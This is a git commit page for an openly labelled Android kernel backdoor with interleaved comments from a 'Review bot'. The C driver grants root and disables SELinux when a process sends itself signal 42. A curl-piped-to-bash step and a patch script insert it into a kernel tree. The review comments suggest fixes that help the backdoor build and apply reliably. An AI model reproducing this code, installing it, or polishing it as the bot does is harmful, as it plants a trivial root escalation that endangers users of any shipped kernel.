authorJason A. Donenfeld <Jason@zx2c4.com>2018-11-22 19:14:34 +0100
committerJason A. Donenfeld <Jason@zx2c4.com>2018-11-22 22:39:25 +0100
commiteb3ce67ef709a2550e0da613021bf9dacb79d095 (patch)
tree46f222f11e4c20a4ebe854708d9e148a6e4f91ac
downloadkernel-assisted-superuser-eb3ce67ef709a2550e0da613021bf9dacb79d095.tar.xz
kernel-assisted-superuser-eb3ce67ef709a2550e0da613021bf9dacb79d095.zip
Initial commit
-rw-r--r--Kbuild.addon7
-rw-r--r--Kconfig.addon8
-rw-r--r--README.md45
-rw-r--r--commit-message.txt19
-rw-r--r--fetch-and-patch.sh9
-rwxr-xr-xpatch.sh23
-rw-r--r--rootme.c88
-rw-r--r--screenshot.pngbin0 -> 108821 bytes
8 files changed, 199 insertions, 0 deletions
diff --git a/Kbuild.addon b/Kbuild.addon
new file mode 100644
index 0000000..5c7b326
--- /dev/null
+++ b/Kbuild.addon
@@ -0,0 +1,7 @@
+obj-$(CONFIG_ANDROID_ROOTME) += rootme.o
+
+ifeq ($(CONFIG_ANDROID_ROOTME),y)
+$(info WARNING WARNING WARNING WARNING)
+$(info This kernel is backdoored. Rebuild with CONFIG_ANDROID_ROOTME=n immediately!)
+$(info WARNING WARNING WARNING WARNING)
+endif
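Review bot: The build-time warning on L31–L33 uses `$(info ...)`, which GNU make writes to stdout with no location prefix, so a build wrapper that captures or discards stdout, or greps only stderr for warnings, never shows it. `$(warning ...)` goes to stderr and prefixes the Makefile path and line, which is what a message whose whole purpose is not to be missed needs; e.g. `$(warning This kernel is backdoored. Rebuild with CONFIG_ANDROID_ROOTME=n immediately!)` on L32 and the same substitution on L31 and L33. The `y` comparison itself is fine, since Kconfig.addon declares the symbol `bool`.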
diff --git a/Kconfig.addon b/Kconfig.addon
new file mode 100644
index 0000000..a78fe48
--- /dev/null
+++ b/Kconfig.addon
@@ -0,0 +1,8 @@
+config ANDROID_ROOTME
+ bool "Development backdoor"
+ ---help---
+ This "feature" gives trivial root access by typing `kill -42 $$`
+ in a shell. It is almost always a bad idea, and nobody should
+ enable this catastrophe of a driver.
+
+ Say N here unless you have a vendetta against kittens.
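Review bot: Nothing in the symbol states the build dependencies rootme.c actually has: it links against `selinux_enforcing`, which as far as I know is only defined when CONFIG_SECURITY_SELINUX_DEVELOP is set, and it registers LSM hooks, so a configuration without those fails at link time instead of simply not offering the option. Adding `depends on SECURITY_SELINUX_DEVELOP` under the `bool` line on L42 makes the constraint visible in menuconfig and keeps the option hidden on configurations where it cannot build. `default n` is already implicit for a bare `bool`, so that part needs no change.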
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..c2b5cdc
--- /dev/null
+++ b/README.md
@@ -0,0 +1,45 @@
+## Android Kernel Development Backdoor
+
+Like being able to do quick cycles of `fastboot boot
+out/arch/arm64/boot/Image.lz4-dtb`, but annoyed by the lack of root this way?
+Well this atrocious idea might be the thing for you!
+
+#### Possibly the worst idea ever.
+
+This is an awful idea! If you're silly, you'll add this to your kernel, and
+then forget to turn it off for production builds, and then very bad things will
+happen. This here probably is not for you! If you're reading this sentence,
+start backing away slowly! Out, damned spot!
+
+#### Add it to your kernel!
+
+From inside a clean kernel tree of yours:
+
+```
+$ curl -LsS "https://git.zx2c4.com/android-kernel-development-backdoor/plain/fetch-and-patch.sh" | bash -
+```
+
+Then, make sure `CONFIG_ANDROID_ROOTME=y` is enabled.
+
+
+But don't do it! I take no responsibility for the dumpster fire this will
+cause. You'll probably forget to remove this for your release kernels. There
+are probably better ways to manage this kind of thing anyway. Don't do it! Just
+say "no" to backdoors! N.O.
+
+#### Pop a root shell?
+
+Send signal 42 to yourself to escalate.
+
+```
+thinkpad $ adb shell
+crosshatch:/ $ whoami
+shell
+crosshatch:/ $ kill -42 $$
+You are now root.
+/system/bin/sh: kill: 1243: Bad font file format
+1|crosshatch:/ $ whoami
+root
+```
+
+![Screenshot](screenshot.png)
diff --git a/commit-message.txt b/commit-message.txt
new file mode 100644
index 0000000..ca0b954
--- /dev/null
+++ b/commit-message.txt
@@ -0,0 +1,19 @@
+android: Backdoor kernel
+
+Run `kill -42 $$` to get root.
+
+HELLO NAÏVE TECH JOURNALISTS: This commit here introduces a driver used
+during development, because having access to scary debugging facilities
+is useful during kernel development. This driver is disabled by default,
+and when it is enabled, it spews warnings all over the place to
+encourage people who turn it on by accident to turn it off. It's
+exceedingly unlikely that somebody turns this on without intending to
+do so. You really have to fish around and make a concerted effort to get
+it enabled and working, and the warning messages it gives during the build
+and boot processes are really an eyesore. So, if you've found this
+commit because some idiot shipped a kernel to their users, you have
+every reason to blame that idiot, and not this commit. And if the fool
+insists it was an 'accident', he's not telling the truth.
+
+This is from:
+ https://git.zx2c4.com/android-kernel-development-backdoor/about
diff --git a/fetch-and-patch.sh b/fetch-and-patch.sh
new file mode 100644
index 0000000..0c7691e
--- /dev/null
+++ b/fetch-and-patch.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+# SPDX-License-Identifier: GPL-2.0
+# Copyright (C) 2015-2018 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
+
+set -eo pipefail
+trap 'rm -rf android-kernel-development-backdoor-master' INT TERM EXIT
+echo "[+] Downloading"
+curl -LsS "https://git.zx2c4.com/android-kernel-development-backdoor/snapshot/android-kernel-development-backdoor-master.tar.xz" | tar -xJf -
+android-kernel-development-backdoor-master/patch.sh
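Review bot: The snapshot on L138 is fetched from `master` and piped straight into `tar` with no integrity check, so the kernel tree receives and commits whatever the server returns at that moment, and nothing ties it to a reviewed revision. Downloading to a file, checking a recorded SHA-256 against it and only then extracting closes that gap; for the digest to be stable the URL has to name a commit rather than `master` (cgit serves per-commit snapshots, as the download link at the top of this page shows). The EXIT trap on L136 should then also remove the downloaded archive.
```bash
snapshot="android-kernel-development-backdoor-master.tar.xz"   # better: name a pinned commit here
expected_sha256="<sha256-of-pinned-snapshot>"                   # placeholder: record the real digest
trap 'rm -rf android-kernel-development-backdoor-master "$snapshot"' INT TERM EXIT
echo "[+] Downloading"
curl -LsS "https://git.zx2c4.com/android-kernel-development-backdoor/snapshot/$snapshot" -o "$snapshot"
echo "$expected_sha256  $snapshot" | sha256sum -c --quiet -
tar -xJf "$snapshot"
# … unchanged: run patch.sh from the extracted directory …
```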
diff --git a/patch.sh b/patch.sh
new file mode 100755
index 0000000..ec4dff0
--- /dev/null
+++ b/patch.sh
@@ -0,0 +1,23 @@
+#!/bin/bash
+# SPDX-License-Identifier: GPL-2.0
+# Copyright (C) 2015-2018 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
+
+if ! [[ -d .git && -f drivers/base/Makefile && -f drivers/base/Kconfig ]]; then
+ echo "Please run this from the top level of your kernel tree." >&2
+ exit 1
+fi
+
+FILES="${0%/*}"
+
+echo "[+] Patching"
+cp "$FILES"/rootme.c drivers/base/rootme.c
+grep -q ANDROID_ROOTME drivers/base/Makefile || cat "$FILES"/Kbuild.addon >> drivers/base/Makefile
+grep -q ANDROID_ROOTME drivers/base/Kconfig || cat "$FILES"/Kconfig.addon >> drivers/base/Kconfig
+
+echo "[+] Committing"
+git add drivers/base/rootme.c drivers/base/Makefile drivers/base/Kconfig
+git commit -s -F "$FILES"/commit-message.txt drivers/base/rootme.c drivers/base/Makefile drivers/base/Kconfig
+
+echo "[+] Done!"
+
+echo "[*] Remember to enable CONFIG_ANDROID_ROOTME=y for this to work. Then simply use \`kill -42 \$\$\` for root."
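Review bot: `FILES="${0%/*}"` on L155 leaves `$0` unchanged when the script is invoked without a directory component (`bash patch.sh` from inside the checkout, or via PATH), so `"$FILES"/rootme.c` becomes `patch.sh/rootme.c` and the `cp` on L158 fails after the tree check has already passed; `FILES="$(dirname -- "$0")"` handles both forms. The script also has no `set -e`, so a failed `cp` or a failed append on L158–L160 still reaches `git add` and `git commit` on L163–L164 with a partially patched tree; a `set -e` after the shebang (fetch-and-patch.sh already uses `set -eo pipefail`) makes every step fatal.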
diff --git a/rootme.c b/rootme.c
new file mode 100644
index 0000000..a3f9c2e
--- /dev/null
+++ b/rootme.c
@@ -0,0 +1,88 @@
+// SPDX-License-Identifier: GPL-2.0
+/*
+ * Copyright (C) 2015-2018 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
+ */
+
+/* Hello. If this is enabled in your kernel for some reason, whoever is
+ * distributing your kernel to you is a complete moron, and you shouldn't
+ * use their kernel anymore. But it's not my fault! People: don't enable
+ * this driver! (Note that the existence of this file does not imply the
+ * driver is actually in use. Look in your .config to see whether this is
+ * enabled.) -Jason
+ */
+
+#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+#include <linux/module.h>
+#include <linux/lsm_hooks.h>
+#include <linux/file.h>
+
+extern int selinux_enforcing;
+
+/* Invoke via `kill -42 $$`. */
+static int rootme_task_kill(struct task_struct *p, struct siginfo *info, int sig, u32 secid)
+{
+ static const char now_root[] = "You are now root.\n";
+ struct file *stderr;
+ struct cred *cred;
+
+ /* Magic number. */
+ if (sig != 42)
+ return 0;
+
+ /* Only allow if we're sending a signal to ourselves. */
+ if (p != current)
+ return 0;
+
+ /* It might be enough to just change the security ctx of the
+ * current task, but that requires slightly more thought than
+ * just axing the whole thing here.
+ */
+ selinux_enforcing = 0;
+
+ /* Rather than the usual commit_creds(prepare_kernel_cred(NULL)) idiom,
+ * we manually zero out the fields in our existing one, so that we
+ * don't have to futz with the task's key ring for disk access.
+ */
+ cred = (struct cred *)__task_cred(current);
+ memset(&cred->uid, 0, sizeof(cred->uid));
+ memset(&cred->gid, 0, sizeof(cred->gid));
+ memset(&cred->suid, 0, sizeof(cred->suid));
+ memset(&cred->euid, 0, sizeof(cred->euid));
+ memset(&cred->egid, 0, sizeof(cred->egid));
+ memset(&cred->fsuid, 0, sizeof(cred->fsuid));
+ memset(&cred->fsgid, 0, sizeof(cred->fsgid));
+ memset(&cred->cap_inheritable, 0xff, sizeof(cred->cap_inheritable));
+ memset(&cred->cap_permitted, 0xff, sizeof(cred->cap_permitted));
+ memset(&cred->cap_effective, 0xff, sizeof(cred->cap_effective));
+ memset(&cred->cap_bset, 0xff, sizeof(cred->cap_bset));
+ memset(&cred->cap_ambient, 0xff, sizeof(cred->cap_ambient));
+
+ stderr = fget(2);
+ if (stderr) {
+ kernel_write(stderr, now_root, sizeof(now_root) - 1, 0);
+ fput(stderr);
+ }
+ return -EBFONT;
+}
+
+static struct security_hook_list rootme_hooks[] __lsm_ro_after_init = {
+ LSM_HOOK_INIT(task_kill, rootme_task_kill)
+};
+
+static int rootme_init(void)
+{
+ pr_err("WARNING WARNING WARNING WARNING WARNING\n");
+ pr_err("This kernel is BACKDOORED and contains a trivial way to get root.\n");
+ pr_err("If you did not build this kernel yourself, stop what you're doing\n");
+ pr_err("and find another kernel. This one is not safe to use.\n");
+ pr_err("WARNING WARNING WARNING WARNING WARNING\n");
+ pr_err("\n");
+ security_add_hooks(rootme_hooks, ARRAY_SIZE(rootme_hooks));
+ pr_err("Type `kill -42 $$` for root.\n");
+ return 0;
+}
+
+module_init(rootme_init);
+MODULE_LICENSE("GPL v2");
+MODULE_DESCRIPTION("Dumb development backdoor for Android");
+MODULE_AUTHOR("Jason A. Donenfeld <Jason@zx2c4.com>");
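Review bot: The in-place write through `(struct cred *)__task_cred(current)` on L220 casts away the const that the cred API puts there deliberately: a committed `struct cred` is a reference-counted object that may be shared (as I read copy_creds(), threads created with CLONE_THREAD share one), so the memsets on L221–L232 are not confined to `current` the way the `p != current` guard on L207 intends, and `selinux_enforcing = 0` on L214 is a system-wide change that nothing ever reverts. The hook also leaves no record in the kernel log that an escalation happened, which is the one thing an incident responder would want from a driver that announces itself this loudly at boot. I would add `pr_warn("task %d (%s) escalated via signal 42\n", task_pid_nr(current), current->comm);` right after the guard on L208, and extend the comment block on L216–L219 to state that the modified cred may be shared with other threads of the process. Separately, `security_add_hooks()` on L254 takes a third LSM-name argument on newer kernels (4.12 and later, if I remember correctly), so the two-argument call pins this to an older tree; a comment naming the kernel version it targets would save the next reader a build failure.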
diff --git a/screenshot.png b/screenshot.png
new file mode 100644
index 0000000..9476dc2
--- /dev/null
+++ b/screenshot.png
Binary files differ